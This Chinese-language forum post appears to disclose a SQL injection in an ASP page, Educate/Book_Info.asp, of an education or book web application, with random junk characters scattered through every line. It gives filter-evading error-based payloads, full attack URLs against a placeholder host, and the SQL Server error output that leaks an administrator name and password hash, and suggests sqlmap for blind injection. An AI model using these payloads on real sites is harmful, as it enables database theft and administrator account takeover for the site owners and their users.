漏洞出现在Educate/Book_Info.asp . ]! ~3 S9 Z% }2 n( {* h
7 `* e* C! h( m( {: e+ q( \# `此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
' l% a6 d& v0 m; n! a o
! p' n* Z9 ]- t6 T! H! j1 x0 Z# rexp:如下6 K. j( E+ W& B# C
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
, ?# t% J3 Z9 ?. u查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)% A8 k: E5 P# ^& y5 h& Y% l
' Y0 f, c- P' c6 F& Nhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
% |0 x6 J$ r% q. |& `- j2 n : j. r; \: a0 {. `+ u2 }" x
Microsoft OLE DB Provider for SQL Server 错误 '80040e07') J( Y/ n: G; o
7 q- {- G+ g0 p3 ^# m将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
+ a* {' C2 e2 {& @& i + X. S8 M; U7 T1 K4 M' ?- c
/Educate/Book_Info.asp,行 8) t/ O+ }7 t4 {/ f% Q. y3 l: P: W
6 a# r$ D% X) x. n: z
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
$ S! P7 M2 a/ F. x. Z4 [% R! C, ~
# b- S0 P$ a, J5 {- ZMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
8 Q, v$ l4 [1 M& h' G8 ] 1 J) R0 ]( X; G& g# j
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。, l- s# ^% h0 z
, o2 r1 I, A! M5 \5 ]+ x( J/Educate/Book_Info.asp,行 8
* r) z& {/ |. d v |